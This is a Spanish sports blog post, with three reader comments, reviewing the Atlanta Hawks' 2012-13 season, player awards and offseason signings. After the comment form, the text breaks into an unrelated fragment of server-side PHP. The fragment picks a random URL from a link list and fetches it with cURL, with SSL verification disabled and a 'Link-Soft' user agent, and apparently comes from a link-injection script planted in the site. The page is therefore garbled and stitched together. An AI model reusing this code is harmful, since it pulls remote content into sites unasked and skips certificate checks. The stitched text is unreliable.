Atlanta Hawks: Bien

31 de July de 2013 por txusma

A pesar de los cambios a principio de temporada, el resultado ha sido prácticamente el mismo. Equipo competitivo pero lejos del nivel de los grandes cocos no solo de la liga sinó de la propia conferencia Este y eso que lo hicieron un mejor que lo que pronosticábamos a principio de temporada. Acabaron con 44 victorias, ligeramente por encima de ese 50% de victorias que comentábamos, y en la sexta posición de la conferencia. Sin embargo y como viene siendo habitual, en Playoffs fueron eliminados en primera ronda, esta vez por los Pacers, tras plantar cara en casa y llegar ponerse con un 2-2. En cuanto Indiana apretó el paso, la eliminatoria cayó por su propio peso.

Se trataba de la primera temporada tras la salida de Joe Johnson. Para sustituirle había llegado un Lou Williams que podía aportar esa frescura ofensiva que JJ había ido perdiendo con el paso de los años y que el ex de los Sixers podía ofrecer a mucho mejor precio saliendo desde el banquillo. En la primera parte de la temporada el plan funcionó y los Hawks llegaron con 22 victorias y 16 derrotas al 18 de Enero de 2013. Ese día, en un partido precisamente contra los Nets de Johnson, Lou Williams se lesionó gravemente la rodilla y tuvo que dar por finalizada su temporada. Los Hawks recibían un serio revés en sus sobrevenidas aspiraciones de quedar entre los 4 primeros de la conferencia. 

Puede parecer exagerado que digamos que la lesión de un jugador de banquillo sea tan importante para un equipo pero en estos Hawks la aportación de Williams era básica. Antes de la lesión y después de la lesión el quinteto titular estaba formado normalmente por Teague, Korver, Smith y Horford con Harris y Stevenson alternándose en la posición de escolta. Imaginad el drama de hacer algún cambio en las posiciones exteriores. Larry Drew se daba la vuelta, miraba el banquillo y encontraba a Harris o Stevenson, al rookie John Jenkins, a Anthony Morrow, a Shelvin Mack… Con semejantes nombres, normal que en muchas ocasiones Kyle Korver pasara a jugar de escolta y Josh Smith o Anthony Tolliver disputaran minutos de alero. No hace falta ni indicar los problemas que comportaba semejante combinación. Por eso, tras la lesión de Williams el balance de los Hawks se quedó en un 22-22, suficiente para asegurar la post-temporada pero corto para luchar por una mejor posición y un mejor cruce en los playoffs. El equipo nunca acabó de encontrar el ritmo y llegó a Playoffs con prácticamente las mismas dudas que tenía el 19 de Enero. A pesar de la lucha, los Pacers dieron buena cuenta de ellos.

PREMIOS

MVP: Al Horford se perdió buena parte de la pasada temporada por culpa de problemas en un hombro pero ha vuelto en plena forma. Acaba la temporada con 17’2 puntos, 10’2 rebotes y 3’2 asistencias. Jeff Teague ha disfrutado de una temporada con galones y ha respondido con 14’6 puntos y 7’2 asistencias.


Rookie:
La lesión de Lou Williams abrió la puerta a John Jenkins que ha alternado buenas rachas con otras desastrosas, como todo rookie que se precie. Ha acabado con 6’1 puntos y un buen porcentaje de 3 (38%) pero ha destacado también en el ámbito defensivo lo que puede suponerle una buena mejora de minutos de cara a la temporada que viene. El otro rookie del equipo, Mike Scott, ha jugado 40 partidos y ha promediado 4’6 puntos y 2’8 rebotes, que no está del todo mal para menos de 10 minutos de juego.

Sorpresa: No creo que ningún aficionado de los Hawks esperara mucho más de Kyle Korver que unos cuantos triples aportados desde el banquillo. La realidad es que Korver ha jugado 60 partidos como titular y ha cuajado una de las mejores temporadas de su carrera acabando  con 10’9 puntos y un 45’7% de acierto desde la línea de 3. Pero no solo en ataque ha destacado sinó que increíblemente ha aportado una intensidad desconocida hasta el momento en defensa.

Decepción: No ha habido ningún jugador que haya aportado muy por debajo de lo esperado a principio de temporada. Tal vez esperábamos algo más de acierto desde la línea de 3 por parte de Anthony Tolliver, pero tampoco vamos a crucificarle por ello.

Esfuerzo en vano: Josh Smith abandonará finalmente los Hawks sin conseguir jugar una final de Conferencia. Este año no ha sido una excepción. A pesar de sus 17’5 puntos, 8’4 rebotes, 4’2 asistencias, 1’2 robos y 1’8 tapones, el equipo volvió a quedar eliminado a las primeras de cambio. Habrá que ver si en los Pistons es capaz de alcanzar cotas más altas.

JUGANDO A GM

Josh Smith ha dejado los Hawks y Dwight Howard no ha llegado. ¿Otro equipo que se apunta a la moda del tanking? Ni mucho menos. A pesar de perder (o dejar de ganar) jugadores importantes, los Hawks no tiran la temporada y han apuntalado los movimientos que ya iniciaron el año pasado. Han renovado a Jeff Teague y Kyle Korver y fichado a Paul Millsap lo que creo que prácticamente les asegura la postemporada un año más. Además, la pérdida de Zaza Pachulia les ha hecho coger una fiebre terrible por fichar interiores y llegan a Atlanta Elton Brand, Pero Antic y Gustavo Ayón, por no hablar de Lucas Nogueria y Mike Muscala, escogidos en el draft. Para echar una mano por fuera y sustituir a Devin Harris, llega el alemán Denis Schoroeder, un jugador llamado a ser importante en el futuro y quien sabe si ya este mismo año.

Analizando la plantilla vemos sobredosis de interiores pero falta mucho por fuera. Jeff Teague será el base titular, Kyle Korver el alero y nos queda la incógnita del escolta. Todo apunta a que será John Jenkins pero más por necesidad que por que esté realmente preparado para asumir el puesto. También es posible que Schroeder salga y desplace a Teague a esa posición. De todas maneras, algo falta porque tampoco sería bueno que Paul Millsap o Anthony Tolliver jugaran muchos minutos de aleros. Busquemos algo bueno y barato a ver qué encontramos. Gary Neal y Alan Anderson eran buenas opciones pero se van a Milwaukee y Brooklyn, respectivamente. Parece que nos vemos vemos abocados a Corey Maggette, Leandro Barbosa, RIP Hamilton o similares. Si salen muuuy baratos, nos lo podríamos plantear.

Comenta

3 comentarios a esta entrada

  1. Simon dice:
    #1

    No me gusta el rumbo a corto plazo que ha tomado la plantilla. Horford va a jugar otro año mas la mayoria de minutos de 5… La plantilla es sensiblemente peor que el año pasado y actualmente veo en PO.como intocables a Heat, Pacers, Nets, Knicks y Bulls, y a estos le añades a Detroit ya tienes 6 equipos fijos. Si Wizards cumple las expectativas es otro que deberia estar si o si por lo que nos queda una plaza para repartir entre Toronto, Cavs y ellos. Toronto los veo por debajo pero no veo a Hawks superando a los Cavs a nada que Bennet dé un nivel aceptable, y Varejao y Bynum puedan jugar al menos entre los dos los 82 partidos de liga.
    Me gustan mucho ( a largo plazo) las elecciones de Schroeder y Nogueira. sobre todo el base.

      Citar

  2. jhc dice:
    #2

    Louis Williams + Paul Millsap > J. Smith

    Yo creo que aunque la coneferencia Este ha subido su nivel aun Atlanta puede permanecer en play-offs con la llegada de Millsap (muy infravalorado este jugador) mas la recuperacion de Louis Williams, Atlanta volvera a estar entre los de arriba, el problema es que el equipo no da para mucho mas que una 1º o 2º rondqa de play offs

      Citar

  3. rumbero dice:
    #3

    A mi ese “Bien” con la trayectoria de los Hawks las últimas temporadas se me antoja algo benevolente. Debe ser uno de los proyectos por excelencia de la NBA que sabes que el tope (si el Este anda más flojo de lo habitual) son semifinales de conferencia. El tema es que finiquitado el proyecto Jojo-Smith no han podido ir a por ninguna estrella para dar el salto ni tampoco se han “atrevido” a hacer limpieza, con lo que traes a buenos jugadores como Lou y Millsap pero que no parece que vayan a llevarte mucho más lejos. Luego está la confección de plantilla como se comenta, auqnue tienen tiempo para retocarla. Muchos interiores (Muscala se va al Blusens y Nogueira parace que también vendrá un año más a España porque no hay hueco) mientras que en el puesto de 2 te tienes que fiar de Stevenson y Jenkins a la espera de saber como andará la rodilla de Williams. Muy justito para entrar en post temporada

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>